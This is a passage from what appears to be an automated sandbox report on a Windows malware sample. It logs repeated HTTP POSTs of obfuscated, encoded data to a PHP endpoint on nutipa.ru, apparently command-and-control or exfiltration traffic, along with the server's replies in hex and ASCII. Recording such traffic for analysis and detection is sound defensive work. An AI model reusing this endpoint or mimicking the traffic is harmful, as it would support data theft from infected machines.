                                                            Dec 15, 2024 19:37:44.186003923 CET1420OUTData Raw: 50 56 43 59 5f 5a 5d 55 5d 5a 56 51 50 5f 57 52 55 54 5e 41 5a 51 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PVCY_Z]U]ZVQP_WRUT^AZQ[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^<-&[)4!-+#?$'-1%X=Q* <$-6]< ),+.F'#P
                                                            Dec 15, 2024 19:37:44.926052094 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:45.160554886 CET944INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W1KrJ%2Bd74o8BZVqNB7v5fP2Z1RRx0HSiHjdmipP%2BLDsaKFTd5fM6KQaaDjNNI0EPYDYRSY0rx4cyRLDdDc8wTnmg3bSYdqxkhzLohN%2FLe0AMVguHvu5SwMVJQJ8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bf2da4b437b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7098&min_rtt=1760&rtt_var=11336&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1740&delivery_rate=32834&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 5d 21 14 31 0f 20 10 27 0d 2c 2c 32 0e 3c 0e 0a 40 26 21 22 01 24 38 38 05 2a 13 0e 0a 31 07 35 58 37 32 29 50 3e 24 35 1f 31 0c 21 51 03 11 22 12 26 2e 27 02 2a 39 09 04 24 32 33 5e 31 3e 30 59 3f 3b 32 13 33 2b 3c 0c 20 00 0a 57 2d 3a 3f 05 2b 39 34 03 2e 2e 0b 0e 20 36 2e 53 0c 17 26 05 3c 39 32 12 21 21 35 1c 24 02 15 1c 37 39 0c 1e 29 0d 2b 0e 30 0a 34 0f 27 3d 38 51 22 20 25 1a 25 14 25 02 20 22 2a 1e 3e 08 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989]!1 ',,2<@&!"$88*15X72)P>$51!Q"&.'*9$23^1>0Y?;23+< W-:?+94.. 6.S&<92!!5$79)+04'=8Q" %%% "*>%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            63192.168.2.449827104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:43.956759930 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:44.310533047 CET2536OUTData Raw: 55 54 43 5f 5a 5c 58 56 5d 5a 56 51 50 59 57 53 55 5c 5e 48 5a 51 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UTC_Z\XV]ZVQPYWSU\^HZQ[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<=>:/]!,(-48Z%=9'>* 3X&(%U8+.F'#P #
                                                            Dec 15, 2024 19:37:45.062305927 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:45.296602011 CET800INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMkzi%2BfG31HK487Hw8kiThbH2k%2F%2B%2BGa1O5lH7IoC1YdWUC8Xt%2BeYLS07xw0h3ZMfK03PJM2oJwFTn99JNKF9hRcO9m7lvGTj%2FCGh4gUD2HHSYUmQS7zxt8uh1g4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bf3af3ac45e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3870&min_rtt=1554&rtt_var=5214&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=72701&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            64192.168.2.449828104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:45.540293932 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:45.890837908 CET2536OUTData Raw: 55 57 43 50 5a 5d 5d 56 5d 5a 56 51 50 5d 57 52 55 55 5e 49 5a 52 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWCPZ]]V]ZVQP]WRUU^IZR[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?&[*,6/)<.7]#0]&:\'--U*0'%>!?,+.F'#P 3
                                                            Dec 15, 2024 19:37:46.635273933 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:46.875665903 CET789INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxGt83aOEwvU1OrI0Jben0kYG8K9vYrPclXz6Oyy6D5ILYtwV3g1jsNNqJvXP6aYh8D8iLM4IKgSCtzr9SMjOeWRSHhXFZdEu2a0HQgelMxn3zIJi1X6NNetVsc%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bfd8f8443b8-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8171&min_rtt=1650&rtt_var=13661&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=27126&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            65192.168.2.449829104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:47.128005981 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:47.482573986 CET2536OUTData Raw: 50 55 43 58 5a 58 58 50 5d 5a 56 51 50 5d 57 57 55 53 5e 45 5a 56 5b 5e 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PUCXZXXP]ZVQP]WWUS^EZV[^\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$[+=9=(5"(771%&.>0'>!(6/.F'#P 3
                                                            Dec 15, 2024 19:37:48.218241930 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:48.471471071 CET798INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsQM%2FUBnkMglca%2Bq8MYNfCgEyHFsjM%2BdB36EA3L%2BtBkKmXK3s5MHbdpW%2BIvmTEet2g5lNIBBQYyn8XgAQujP0AAdHdSLlhHmqbImU2DayJ3Gna1X5tZjqYrmnnE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c0769454375-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3686&min_rtt=1693&rtt_var=4621&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=82771&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            66192.168.2.449830104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:48.709377050 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:49.060678959 CET2536OUTData Raw: 55 53 46 58 5a 5a 5d 54 5d 5a 56 51 50 5b 57 5a 55 51 5e 45 5a 55 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USFXZZ]T]ZVQP[WZUQ^EZU[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?=)?*7\!?:(] +1.%-=(3Z0.]=0>-;.F'#P +
                                                            Dec 15, 2024 19:37:49.797719002 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:50.036365986 CET794INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QZAMLzmx8DsWCZnA2%2BcKd6IWs6NlaMsjnAaRl9KI%2FsEerhS3t%2FkZahOI8PwqREtEwrSMa6i18LYO8i2uKELOaM2KsxXGBxBkjA3Y9qPWEzyjo8WYKr8fLyXGO4I%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c1149cf72c2-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4224&min_rtt=2321&rtt_var=4677&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=83205&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            67192.168.2.449832104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:50.290834904 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:50.638664007 CET1420OUTData Raw: 55 50 43 5a 5f 5d 5d 51 5d 5a 56 51 50 5a 57 55 55 50 5e 45 5a 53 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPCZ_]]Q]ZVQPZWUUP^EZS[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\?=*8"(.8#(&%%Q*3(3>?#9V-;.F'#P /
                                                            Dec 15, 2024 19:37:51.382818937 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:51.645728111 CET945INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BW9VXQaAOMFSQGLjZl%2F3mrWPOQAaUUa8PhfejkHhErEgkV%2Bz5NxvlNHFvQLadhyLHsO52hggp6FC9tBxlxCP9HqDkfv9v2qAtfYLp8iir8RbLlEgnt%2FRvtLo78%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c1b3df9c33e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4475&min_rtt=1587&rtt_var=6371&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1740&delivery_rate=59128&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 59 35 5c 21 0f 37 00 2b 0b 3a 12 36 0b 29 30 23 1b 27 22 0f 10 30 2b 3f 5f 3d 3d 09 52 26 07 31 5a 23 21 32 0d 3c 37 2a 00 31 0c 21 51 03 11 21 00 31 2e 02 5a 3d 17 3c 17 32 32 2f 5f 26 13 28 15 3c 38 04 50 24 28 09 55 37 3d 28 1b 3a 14 0a 12 3f 04 2c 03 3a 2d 2a 54 23 36 2e 53 0c 17 25 5d 3f 07 03 03 37 0c 18 0e 33 3c 2b 1f 34 2a 26 52 3e 0d 0d 08 24 0d 06 0e 27 00 38 14 22 0e 39 53 25 2a 2d 06 37 0c 2a 1e 2a 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989Y5\!7+:6)0#'"0+?_==R&1Z#!2<7*1!Q!1.Z=<22/_&(<8P$(U7=(:?,:-*T#6.S%]?73<+4*&R>$'8"9S%*-7**"%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            68192.168.2.449833104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:50.416258097 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:50.763670921 CET2536OUTData Raw: 55 53 43 58 5f 5e 5d 54 5d 5a 56 51 50 5f 57 50 55 51 5e 45 5a 50 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USCX_^]T]ZVQP_WPUQ^EZP[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]?.^=:/\!?%?>3X44'>92>-W=?0.6^?%R/.F'#P
                                                            Dec 15, 2024 19:37:51.505918026 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:51.766484976 CET795INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lBQnQq62rMA1T0%2FhaAAxYGEMAIDGHh72hTfau95AjewAVOKdWQ2mJnnCiVX6ioZFJDRVEpxLrFSIV2tDt4bS8WPanHInzB3eq%2B4thVZR%2FnzBizZ1YZUCWbLymtE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c1bfcad4217-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6793&min_rtt=1690&rtt_var=10841&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=34335&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            69192.168.2.449834104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:52.014276981 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:52.373028994 CET2536OUTData Raw: 55 55 43 51 5f 5d 58 5e 5d 5a 56 51 50 5c 57 56 55 52 5e 45 5a 54 5b 5e 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUCQ_]X^]ZVQP\WVUR^EZT[^\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y')-->;]",C?4/$Y%.'.>X$-9?U=/;.F'#P 7
                                                            Dec 15, 2024 19:37:53.104518890 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:53.347718000 CET801INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fh2irfLVZZhnKC9yCbplm1zwUw%2FjJ3qBj%2Br7m4xFdw5VQyf3NmrWRKBPMy1YILAUhsiBPUvXmPE65V1cL%2FKPMtXo4ou35%2B69UUyA6GymIlIgB%2BcduuK0%2BgLm5OI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c25eb710f64-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8358&min_rtt=1619&rtt_var=14086&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=26290&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            70192.168.2.449835104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:53.584983110 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:53.936096907 CET2536OUTData Raw: 55 57 43 5d 5f 5a 5d 54 5d 5a 56 51 50 51 57 55 55 52 5e 44 5a 52 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWC]_Z]T]ZVQPQWUUR^DZR[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]?"Y>+X6D+.,#$Z'.=%%T)#3)=0:8+.F'#P
                                                            Dec 15, 2024 19:37:54.685503006 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:54.933007956 CET793INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDQjHzBAyWvWhZt5YzbRea%2B8R0I5LMLD7iXxhmTbrjvSoFNusuP685%2B7VeHLT6z0bO%2FZH0Orc%2FjKivmDxmKNY7N3xz%2B2EBLrQG23QromU6EeZYodVrsMKymqWks%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c2fdbf6433f-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3988&min_rtt=1730&rtt_var=5165&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=73744&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a
                                                            Data Ascii: 44W@T
                                                            Dec 15, 2024 19:37:55.127337933 CET5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            71192.168.2.449836104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:55.391752958 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:55.748399019 CET2536OUTData Raw: 55 52 43 5e 5f 5e 5d 53 5d 5a 56 51 50 5f 57 52 55 52 5e 42 5a 50 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: URC^_^]S]ZVQP_WRUR^BZP[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<="Z?*7!.C+(4?(Z'=:2>:*3?3=(#%S/.F'#P
                                                            Dec 15, 2024 19:37:56.492911100 CET25INHTTP/1.1 100 Continue
